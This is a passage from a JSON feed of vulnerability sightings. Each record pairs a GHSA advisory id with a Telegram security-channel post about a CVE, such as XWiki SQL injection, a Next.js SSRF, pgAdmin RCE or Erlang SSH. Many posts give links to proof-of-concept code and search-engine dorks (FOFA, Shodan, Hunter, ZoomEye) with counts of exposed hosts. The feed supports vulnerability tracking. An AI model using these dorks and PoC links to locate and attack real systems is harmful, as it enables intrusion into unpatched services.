"https://vulners.com/redhat/RHSA-2023:4650", "creation_timestamp": "2023-08-15T03:29:25.000000Z"}, {"uuid": "d0c7fbbf-4546-484e-b09a-5d5e971ec4df", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VR59-GM53-V7CQ", "type": "published-proof-of-concept", "source": "https://t.me/cybersecplayground/274", "content": "\ud83d\udea8 Alert: CVE-2025-32429 \u2013 Blind SQL Injection in XWiki Platform\nA critical Blind SQL Injection vulnerability has been discovered in the XWiki Platform, exposing thousands of services to potential exploitation.\n\n\ud83d\udd25 PoC\n\ud83d\udcc2 GitHub: https://github.com/byteReaper77/CVE-2025-32429\n\n\ud83e\udde0 Impact\n\u2022 Vulnerability allows unauthenticated attackers to perform SQL injection\n\u2022 Can lead to data leakage, credential theft, and in some cases RCE\n\u2022 Affects core logic in query processing\n\n\ud83d\udcca Exposure Stats\n\ud83d\udd0d Hunter Query: product.name=\"XWiki\"\n\ud83c\udf10 Link: https://hunter.how/list?searchValue=product.name%3D%22XWiki%22\n\n\ud83d\udcda References\n\u2022 Advisory: GHSA-vr59-gm53-v7cq\n\u2022 JIRA Ticket: XWIKI-23093\n\n\ud83d\udd12 Mitigation\n\u2022 Apply official patches or upgrade to the latest secure version\n\u2022 Use a web application firewall (WAF) with SQLi detection\n\u2022 Monitor suspicious queries or traffic anomalies\n\n\ud83d\udcac Share to warn others \u2013 awareness saves infrastructure!\n\n#CVE2025 #XWiki #BlindSQLi #bugbountytips #infosec #vulnerability #hunterhow #cybersecurity\n\ud83d\udce1 Follow @cybersecplayground for daily CVEs, PoCs, and hacking insights.", "creation_timestamp": "2025-07-28T20:53:07.000000Z"}, {"uuid": "febfb3cc-df18-4050-9aae-146dbcb20153", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FR5H-RQP8-MJ6G", "type": "published-proof-of-concept", "source": "https://t.me/poxek/4009", "content": "\ud83d\udea8Alert\ud83d\udea8CVE-2024-34351:Next.js Server-Side Request Forgery in Server Actions\n\ud83d\udd25PoC: https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps#/ \n\u26a0A SSRF vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.\n\ud83d\udcca3.1M+ Services are found on  hunter.how\n\ud83d\udd17Hunter Link: https://hunter.how/list?searchValue=product.name%3D%22Next.js%22 \n\ud83d\udcf0Refer: https://github.com/advisories/GHSA-fr5h-rqp8-mj6g \nHunter:/product.name=\"Next.js\"\nFOFA:app=\"Next.js\"\nSHODAN:http.component:\"Next.js\"\n#NextJS #SSRF #Vulnerability", "creation_timestamp": "2024-05-10T12:02:39.000000Z"}, {"uuid": "3df8c2ed-e86a-4be2-8333-55e820b8cbc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J87X-J6MH-MV8V", "type": "published-proof-of-concept", "source": "https://t.me/ap_security/196", "content": "\u2604\ufe0fCVE-2023-2163: Linux Kernel eBPF verifier bug\n\n\u041d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0432\u0435\u0440\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u0432 BPF \u0432 \u044f\u0434\u0440\u0435 Linux&gt;=5.4 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0435 \u043f\u0443\u0442\u0438 \u043a \u043a\u043e\u0434\u0443 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043f\u043e\u043c\u0435\u0447\u0430\u044e\u0442\u0441\u044f \u043a\u0430\u043a \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0435, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u043c\u0443 \u0447\u0442\u0435\u043d\u0438\u044e/\u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u044f\u0434\u0440\u0430\ud83d\udd13\n\n\ud83d\udce3\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC:\nhttps://github.com/google/security-research/security/advisories/GHSA-j87x-j6mh-mv8v\n\n#cve #poc #exploit #linux", "creation_timestamp": "2023-10-18T05:13:30.000000Z"}, {"uuid": "3df26138-483f-446d-9c93-c710fdc55b44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G5VF-V6WF-7W2R", "type": "seen", "source": "https://t.me/android_guards_today/65", "content": "\u0412\u044b\u0448\u0435\u043b Tink 1.5.0 c security \u0444\u0438\u043a\u0441\u043e\u043c \u0434\u043b\u044f Java \u0438 Android \u043a\u0430\u0441\u0430\u044e\u0449\u0438\u043c\u0441\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0441 \u0446\u0435\u043b\u043e\u0441\u0442\u043d\u043e\u0441\u0442\u044c\u044e \u0448\u0438\u0444\u0440\u043e\u0442\u0435\u043a\u0441\u0442\u0430. \u0421\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u044c \u044d\u0442\u043e\u0439 \u0431\u0430\u0433\u0438 \u043d\u0435\u0432\u044b\u0441\u043e\u043a\u0430\u044f, \u043d\u043e \u0441\u0430\u043c\u0430 \u0441\u0443\u0442\u044c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0430\u044f - \u043e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u043d\u044b\u0439 \u0448\u0438\u0444\u0440\u043e\u0442\u0435\u043a\u0441\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0432\u0441\u0435 \u0435\u0449\u0435 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0434\u043e \u0442\u043e\u0433\u043e \u0436\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u043e\u0433\u043e \u0442\u0435\u043a\u0441\u0442\u0430. \u042d\u0442\u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u0438\u0437-\u0437\u0430 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0435\u0439 \u0440\u0430\u0431\u043e\u0442\u044b \u0441 Unicode \u0432 Java.\n\n#4developers #cryptography #tink \n\nhttps://github.com/advisories/GHSA-g5vf-v6wf-7w2r", "creation_timestamp": "2020-10-16T09:19:44.000000Z"}, {"uuid": "e80f1e45-7fba-41db-943e-99a45248a7ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XXX5-8MVQ-3528", "type": "seen", "source": "https://t.me/linkersec/93", "content": "Linux Kernel Heap Out-Of-Bounds Write in xt_compat_target_from_user()\n\nVery old vulnerability, it can be exploited for LPE. Kernels starting from v2.6.19 are affected.\n\nhttps://github.com/google/security-research/security/advisories/GHSA-xxx5-8mvq-3528", "creation_timestamp": "2021-07-08T18:06:55.000000Z"}, {"uuid": "cef9e03f-cf06-4c08-8b6b-521694c79a9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27Q9-H529-Q4G3", "type": "seen", "source": "Telegram/FTCg6bLhMbHwuymdw664U08urdu_WIPJlzOGxe3hbftHcQaO", "content": "", "creation_timestamp": "2024-04-06T04:41:58.000000Z"}, {"uuid": "1ab813ed-77a6-47a4-9e02-e8c3c7c20519", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C5V3-F4MM-7XMW", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/18454", "content": "\ud83d\udea8CVE-2025-50054: Buffer overflow in OpenVPN ovpn-dco-win version 1.3.0 and earlier and version 2.5.8 and earlier allows a local user process to send a too large control message buffer to the kernel driver resulting in a system crash\n\nZoomEye Link: https://www.zoomeye.ai/searchResult?q=YXBwPSJPcGVuVlBOIg%3D%3D\n\nResults: 2,020,603\n\nZoomEye Dork: app=\"OpenVPN\"\n\nAdvisory: https://github.com/advisories/GHSA-c5v3-f4mm-7xmw\n\nCVSS: 5.5\n\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\n\nFollow @zoomeye_team's official Twitter/X account and send the message \u201cDark Web Informer\u201d via DM to receive an extra 15-day membership.\n\nI am trying to do more for the DWI community, so this is just the start! \ud83d\udc99", "creation_timestamp": "2025-06-24T17:27:34.000000Z"}, {"uuid": "fcb8f5e2-a224-40d7-8977-9d1bdc8798e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-596C-W2JC-JMMX", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/18381", "content": "\ud83d\udea8CVE-2025-20260: Cisco ClamAV exploit causes buffer overflow, denial of service, &amp; potential code execution\n\nFOFA Link: https://en.fofa.info/result?qbase64=YXBwPSJDSVNDTy1DbGFtQVYi\n\nFOFA Query: app=\"CISCO-ClamAV\"\n\nResults: 4,482\n\nPatch Details: https://blog.clamav.net/2025/06/clamav-143-and-109-security-patch.html\n\nAdvisory: https://github.com/advisories/GHSA-596c-w2jc-jmmx\n\nCVSS: 9.8", "creation_timestamp": "2025-06-20T21:20:24.000000Z"}, {"uuid": "ee131e9a-99ef-4958-b73a-5c13d8864ebc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20181101-AP", "type": "published-proof-of-concept", "source": "https://t.me/alexmakus/2498", "content": "\u0415\u0449\u0435 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u0442\u0435\u043c\u0443 \u0438\u043d\u0444\u043e\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438:\n\n1. \u041a\u0441\u0442\u0430\u0442\u0438, \u043e Facebook. \u041d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0432\u0441\u0442\u0440\u0435\u0442\u0438\u043b \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u043f\u043e\u044f\u0432\u0438\u043b\u0438\u0441\u044c \u043d\u0430 \u043f\u0440\u043e\u0434\u0430\u0436\u0443 81 \u0442\u044b\u0441\u044f\u0447\u0430 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438. \nhttps://www.digitalshadows.com/blog-and-research/81000-hacked-facebook-accounts-for-sale-5-things-to-know/\n\u0422\u0443\u0442 \u0435\u0441\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u043c\u043e\u0433\u0430\u043b\u0430 BBC \u0441 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435\u0439: \n- 81 \u0442\u044b\u0441\u044f\u0447\u0430 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432 \u2014\u00a0\u044d\u0442\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u0435, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0432 \u0430\u0440\u0445\u0438\u0432\u0435 \u0435\u0441\u0442\u044c \u043b\u0438\u0447\u043d\u0430\u044f \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u043a\u0430 (\u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u0434\u0430\u043d\u043d\u044b\u0435). \u0414\u0430\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0444\u0438\u043b\u044f \u0432\u043a\u043b\u044e\u0447\u0430\u044e\u0442 \u0432 \u0441\u0435\u0431\u044f \u0438\u043c\u0435\u043d\u0430, \u0430\u0434\u0440\u0435\u0441\u0430. \u043a\u043e\u043d\u0442\u0430\u043a\u0442\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e, \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u0440\u0443\u0437\u0435\u0439 \u0438 \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u043a\u0443. \u0424\u043e\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0439 \u0432 \u043f\u0440\u043e\u0444\u0438\u043b\u044f\u0445 \u043d\u0435\u0442. \u041e\u0431\u0449\u0435\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043f\u0440\u043e\u0444\u0438\u043b\u0435\u0439 \u0432 \u0430\u0440\u0445\u0438\u0432\u0435 \u2014\u00a0257 256. \u0411\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u044d\u0442\u0438\u0445 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432 (30%) \u2014\u00a0\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0424\u0411 \u0438\u0437 \u0423\u043a\u0440\u0430\u0438\u043d\u044b, \u0435\u0449\u0435 9% - \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 \u0420\u043e\u0441\u0441\u0438\u0438. \u041f\u0440\u043e\u0434\u0430\u0432\u0435\u0446 \u0442\u0430\u043a\u0436\u0435 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u0443 \u043d\u0435\u0433\u043e \u0435\u0441\u0442\u044c 120 \u043c\u043b\u043d \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u043e\u0432. \u041c\u0435\u0442\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u044b \u044d\u0442\u0438 \u0434\u0430\u043d\u043d\u044b\u0435, \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u0435\u043d, \u0445\u043e\u0442\u044f \u0435\u0441\u0442\u044c \u043f\u043e\u0434\u043e\u0437\u0440\u0435\u043d\u0438\u0435 \u043d\u0430 \u043a\u0430\u043a\u043e\u0435-\u0442\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435 \u0432 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0435. \n\n2. \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 side-channel \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440\u0430\u0445 Intel, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u043c \u043a\u043b\u044e\u0447\u0430\u043c \u0438 \u0434\u0440\u0443\u0433\u043e\u0439 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438. \u0412\u0441\u0442\u0440\u0435\u0447\u0430\u0439\u0442\u0435 PortSmash! \n\u0414\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0442\u0443\u0442: https://seclists.org/oss-sec/2018/q4/123. \u0412\u043e \u0432\u0441\u0435\u043c \u0432\u0438\u043d\u043e\u0432\u0430\u0442 Hyper-Threading, \u043a\u043e\u0433\u0434\u0430, \u0433\u0440\u0443\u0431\u043e \u0433\u043e\u0432\u043e\u0440\u044f, \u043e\u0434\u043d\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u0438\u0437 \u0441\u0432\u043e\u0435\u0433\u043e \u0442\u0440\u0435\u0434\u0430 \u043d\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440\u0435 \u043c\u043e\u0436\u0435\u0442, \u043f\u043e \u0441\u0443\u0442\u0438, \u0437\u0430\u0433\u043b\u044f\u043d\u0443\u0442\u044c \u0432 \u0434\u0440\u0443\u0433\u043e\u0439 \u0442\u0440\u0435\u0434 \u2014\u00a0\u0438\u0437\u0443\u0447\u0438\u0432 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u044d\u0448\u0430\u043c \u0438 \u0442\u0430\u0439\u043c\u0438\u043d\u0433 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439. \u0412\u044b\u0445\u043e\u0434 \u043e\u0434\u0438\u043d \u2014\u00a0\u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0442\u044c HT, \u0445\u043e\u0442\u044f Intel \u0441\u0447\u0438\u0442\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u043d\u0435\u0442, \u0438 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u0438\u0441\u0430\u0442\u044c \u0442\u0430\u043a\u043e\u0439 \u043a\u043e\u0434, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432 \u043a \u0430\u0442\u0430\u043a\u0430\u043c \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0440\u043e\u0434\u0430. \u042d\u0442\u0430 \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u043d\u0435 \u0438\u043c\u0435\u0435\u0442 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u044f \u043a Spectre \u0438 \u043f\u0440\u043e\u0447. \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0441\u043f\u0435\u043a\u0443\u043b\u044f\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f. \n\n\n3. \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0434\u0432\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Bluetooth Low Energy \u0447\u0438\u043f\u0430\u0445 Texas Instruments - \u0447\u0438\u043f\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0440\u043e\u0443\u0442\u0435\u0440\u0430\u0445 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u0435\u0439 \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a Aruba, Cisco \u0438 Meraki. \u041f\u0435\u0440\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f Bleeding Bit, \u0432\u0442\u043e\u0440\u0430\u044f \u0432\u0440\u043e\u0434\u0435 \u0431\u044b \u0431\u0435\u0437 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f, \u043d\u043e \u0432 \u0438\u0442\u043e\u0433\u0435 \u043e\u0434\u043d\u0430 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u0435\u0442 memory overflow \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435 \u0438\u0441\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435, \u0430 \u0432\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u0443\u044e \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0443 \u043d\u0430 \u0440\u043e\u0443\u0442\u0435\u0440\u044b Aruba, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0438. \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430 \u043d\u0443\u0436\u043d\u043e \u0431\u044b\u0442\u044c \u0432 \u043f\u0440\u0435\u0434\u0435\u043b\u0430\u0445 \u0434\u043e\u0441\u044f\u0433\u0430\u0435\u043c\u043e\u0441\u0442\u0438 Bluetooth \n\n\u0421\u0441\u044b\u043b\u043a\u0438 \u043f\u043e \u0442\u0435\u043c\u0435:\nhttps://www.kb.cert.org/vuls/id/317277/\nhttps://www.arubanetworks.com/assets/alert/ARUBA-PSA-2018-006.txt\nhttps://meraki.cisco.com/blog/cisco-meraki-customer-advisories/\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181101-ap\n\n4. 0-day \u0432 Virtual Box\nhttps://github.com/MorteNoir1/virtualbox_e1000_0day/blob/master/README.md\n\n5. \u0423\u0442\u0435\u0447\u043a\u0430 \u0434\u0430\u043d\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u043e\u0442\u0434\u0435\u043b\u0435\u043d\u0438\u044f \u0431\u0430\u043d\u043a\u0430 HSBC\nhttps://www.databreachtoday.com/hsbc-bank-alerts-us-customers-to-data-breach-a-11685", "creation_timestamp": "2018-11-08T14:40:59.000000Z"}, {"uuid": "0e15d713-0afd-4df5-a0a6-d1d2a5b9f25d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9FJV-PX63-6JVJ", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/17853", "content": "\ud83d\udea8CVE-2025-36560: Server-side Request Forgery Vulnerability\n\nFOFA Link: https://en.fofa.info/result?qbase64=YXBwPSJhLWJsb2ctY21zIg%3D%3D\n\nFOFA Query: app=\"a-blog-cms\"\n\nResults: 5,072\n\nAdvisory: https://github.com/advisories/GHSA-9fjv-px63-6jvj\n\nCVSS: 9.2", "creation_timestamp": "2025-06-05T00:54:35.000000Z"}, {"uuid": "083b270f-849c-45b5-b3aa-11f2839711ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J972-J939-P2V3", "type": "published-proof-of-concept", "source": "Telegram/rXYL1lXWkEU6X4s-B12vmJDiUkp3J5RpkWN8Rf8Wlc0XZWI", "content": "", "creation_timestamp": "2025-06-02T12:01:30.000000Z"}, {"uuid": "e23571a6-fd81-48b9-81a8-cc626a6d92d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CQ37-G2QP-3C2P", "type": "published-proof-of-concept", "source": "Telegram/rXYL1lXWkEU6X4s-B12vmJDiUkp3J5RpkWN8Rf8Wlc0XZWI", "content": "", "creation_timestamp": "2025-06-02T12:01:30.000000Z"}, {"uuid": "66202fc5-ab69-4c6c-b518-f9e9b651d1e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-352J-376Q-2PMC", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/17763", "content": "\ud83d\udea8CVE-2025-22157: PrivEsc (Privilege Escalation) in Jira Core Data Center\n\nFOFA Link: https://en.fofa.info/result?qbase64=YXBwPSJKSVJBIg%3D%3D\n\nFOFA Query: app=\"JIRA\"\n\nGitHub Advisory: https://github.com/advisories/GHSA-352j-376q-2pmc\n\nResults: 94,656 results", "creation_timestamp": "2025-06-02T17:04:01.000000Z"}, {"uuid": "53141762-1324-4d46-9225-8584d52d8685", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G73C-FW68-PWX3", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/17801", "content": "\ud83d\udea8CVE-2025-2945: pgAdmin 4 Vulnerable to Remote Code Execution\n\nFOFA Link: https://en.fofa.info/result?qbase64=Ym9keT0icGctc3AtY29udGVudCIgJiYgdGl0bGU9InBnQWRtaW4gNCI%3D\n\nFOFA Query: body=\"pg-sp-content\" &amp;&amp; title=\"pgAdmin 4\"\n\nResults: 44,485\n\nAdvisory: https://github.com/advisories/GHSA-g73c-fw68-pwx3\n\nCVSS: 10", "creation_timestamp": "2025-06-03T22:50:38.000000Z"}, {"uuid": "cf92c5d6-8b9b-44c8-8d71-db8eae7035ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-37CP-FGQ5-7WC2", "type": "seen", "source": "https://t.me/TheDarkWebInformer/17793", "content": "\ud83d\udea8CVE-2025-32433: Vulnerability in Erlang/OTP SSH Implementation\n\nFOFA Link: https://en.fofa.info/result?qbase64=YXBwPSJFcmxhbmci\n\nFOFA Query: app=\"Erlang\"\n\nResults: 2,257,938\n\nAdvisory: https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2\n\nCVSS: 10", "creation_timestamp": "2025-06-03T16:58:20.000000Z"}, {"uuid": "a6aba777-edc5-45cf-a6a6-bf4f227672b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-356W-63V5-8WF4", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/17956", "content": "\ud83d\udea8CVE-2025-32395: Vite HTTP Request Target Denial of Service\n  \nFOFA Link: https://en.fofa.info/result?qbase64=Ym9keT0iL0B2aXRlL2NsaWVudCI%3D\n\nFOFA Query: body=\"/@vite/client\"\n\nResults: 130,393\n\nAdvisory/PoC: https://github.com/advisories/GHSA-356w-63v5-8wf4\n\nCVSS: 6.0", "creation_timestamp": "2025-06-14T17:54:21.000000Z"}, {"uuid": "59059ee7-0b7d-411b-91dd-f05bd1359980", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 